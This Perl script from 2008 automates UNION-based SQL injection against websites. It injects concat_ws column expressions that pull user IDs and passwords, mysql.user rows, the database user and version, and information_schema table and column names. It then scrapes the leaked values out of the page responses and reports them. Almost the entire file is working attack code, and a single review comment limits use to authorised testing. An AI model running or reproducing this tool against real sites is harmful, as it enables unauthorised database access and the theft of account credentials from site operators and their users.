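#!/usr/bin/perl
# sm4x - 2008
# 1nf0rm3r.pl
# quick perl script to extract db information via website sql injections
# v1.1 - 2008-08-20
#
# Usage: perl informer.pl [from_limit to_limit]
#   With two numeric arguments every candidate query is additionally
#   suffixed with "+limit+N,1" for N in [from_limit, to_limit); without
#   them only the unlimited form is requested.
#
# The script prompts for the start of an injectable URL (everything up to
# and including "+union+select+") and for the tail appended after the
# injected column expression (e.g. ",2"), then requests every
# vector x table x comment-terminator combination and collects whatever
# the page echoes back between the "$$" and ":$" markers.
#
# NOTE(review): this is an intrusive testing tool. Run it only against
# systems you are explicitly authorised to test; every request it sends
# is visible server-side as an injection attempt.

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request;
#use Crypt::SSLeay;   # required for https:// targets

# Column expressions to inject. Each one MUST wrap its output as
# "$$<data>:$" (0x24 = '$', 0x3a = ':'): the response parser below only
# keeps text between "$$" and ":$", so anything else is silently dropped.
# Add your own for more dumps.
my @account_vectors = (
    'concat_ws(0x24,0x24,concat_ws(0x3a,userid,password,0x24))',
    'concat_ws(0x24,0x24,concat_ws(0x3a,user(),version(),user(),0x24))',
    'concat_ws(0x24,0x24,concat_ws(0x3a,table_schema,table_name,table_type,0x24))',
    'concat_ws(0x24,0x24,concat_ws(0x3a,table_name,column_name,0x24))',
);

# Tables appended with "+from+". Every vector is tried against every table
# (a cross product, not a pairing), so SQL errors for the combinations that
# make no sense are expected and simply yield no data.
# An empty string means "no FROM clause".
my @account_dbnames = (
    'mysql.user',
    'user',
    'information_schema.tables',
    'information_schema.columns',
);

# Comment terminators to try after the injected query ('' = none).
my @comments = ('', '--', '/*');

# ---------------------------------------------------------------------------

my @sqldata;     # unique values, in the order first seen
my @urlhits;     # unique URLs that yielded a new value
my %seen_data;   # dedupe for @sqldata
my %seen_url;    # dedupe for @urlhits (separate from %seen_data so a
                 # value can never collide with a URL)

# Optional limit window from the command line; missing args mean "none".
# Reject anything that is not a plain integer instead of letting Perl
# silently coerce it to 0.
my $from_limit = defined $ARGV[0] ? $ARGV[0] : 0;
my $to_limit   = defined $ARGV[1] ? $ARGV[1] : 0;
foreach my $limit ($from_limit, $to_limit) {
    die "[-] limits must be non-negative integers\n" unless $limit =~ /^\d+$/;
}

system('clear');   # cosmetic only; failure is harmless

print q{
[+] ---------------------------------------------------------------------
[+]                         .:: 1nf0rm4nt ::.
[+] ---------------------------------------------------------------------
};
print "[+] Usage: perl $0 [from_limit to_limit]\n";
print "[+] Start link: everything up to and including +union+select+\n";
print "[+] End link:   the tail after the injected column, e.g. ,2\n";
if ($from_limit > -1 && $to_limit > 0) {
    print "[+] Limit $from_limit to $to_limit\n";
}

# Prompt for the two halves of the injectable URL. STDIN may be at EOF
# when the script is driven non-interactively; abort rather than carry on
# with an undefined target.
print "[+] Site start link: ";
my $start_link = <STDIN>;
defined $start_link or die "\n[-] no start link given\n";
chomp $start_link;
# Only prepend a scheme when none is present; the old check looked for
# "http://" literally and so mangled https:// targets into "http://https://".
$start_link = "http://$start_link" unless $start_link =~ m{^https?://};

print "[+] Site ending link: ";
my $end_link = <STDIN>;
defined $end_link or die "\n[-] no end link given\n";
chomp $end_link;

print "[+] Targeting: $start_link$end_link\n";
print "[+]--------------------------------\n";
print "[+] .:: Scanning ... ::.\n";

# One agent for the whole run, with a timeout so a hanging target cannot
# stall the scan indefinitely (previously a fresh agent was built per
# request and no timeout was ever set). Tune as needed.
my $useragent = LWP::UserAgent->new(timeout => 20);

foreach my $vector (@account_vectors) {
    my $link = $start_link . $vector . $end_link;

    foreach my $db (@account_dbnames) {
        my $link2 = length($db) > 0 ? $link . '+from+' . $db : $link;

        if ($from_limit != $to_limit && $to_limit > 0) {
            # Walk the limit window one row at a time.
            for (my $i = $from_limit; $i < $to_limit; $i++) {
                my $limited = $link2 . '+limit+' . $i . ',1';
                foreach my $comment (@comments) {
                    probe_url($useragent, $limited . $comment);
                }
            }
        }
        else {
            foreach my $comment (@comments) {
                probe_url($useragent, $link2 . $comment);
            }
        }
    }
}

# ---------------------------------------------------------------------------
# Report: unique values first, then the URLs that produced them.

print q{
[+] ---------------------------------------------------------------------
[+]                           .:: r3p0rt ::.
[+] ---------------------------------------------------------------------
};
print "[+] $_\n" foreach @sqldata;
# uncomment to visually separate the values from the query URLs
#print "[+] ---------------------------------------------------------------------\n";
print "[+] $_\n" foreach @urlhits;
print "[+] ---------------------------------------------------------------------\n";
print "[+] Total: ", scalar(@sqldata), "\n";
print "\n[+] Done\n";

# ---------------------------------------------------------------------------

# Request one candidate URL and record every "$$<data>:$" value found in
# the body. Every value is printed as it is seen (duplicates included);
# @sqldata and @urlhits only receive first occurrences.
# Returns the number of values found in this response (0 on HTTP failure).
sub probe_url {
    my ($ua, $url) = @_;

    my $response = $ua->request(HTTP::Request->new(GET => $url));
    return 0 unless $response->is_success;

    my @rows = extract_rows($response->content);
    foreach my $data (@rows) {
        if (!$seen_data{$data}) {
            push @sqldata, $data;
            $seen_data{$data} = 1;
            # Credit the URL that first yielded something new. The old
            # unlimited branch pushed $pwnd_link_limit_comments here, i.e.
            # a stale value from the limit branch or undef.
            if (!$seen_url{$url}) {
                push @urlhits, $url;
                $seen_url{$url} = 1;
            }
        }
        # print, not printf: $data is server-controlled, and a '%' in it
        # would otherwise be interpreted as a format directive.
        print "[+] $data\n";
    }
    return scalar @rows;
}

# Pull the injected values back out of a response body: for each chunk
# after a "$$" marker, the text up to the first ":$". Returns an empty
# list when the "$$" marker never appears.
sub extract_rows {
    my ($content) = @_;
    return () unless defined $content && $content =~ /\$\$/;

    my @rows;
    foreach my $item (split /\$\$/, $content) {
        next unless $item =~ /:\$/;
        push @rows, substr($item, 0, index($item, ':$'));
    }
    return @rows;
}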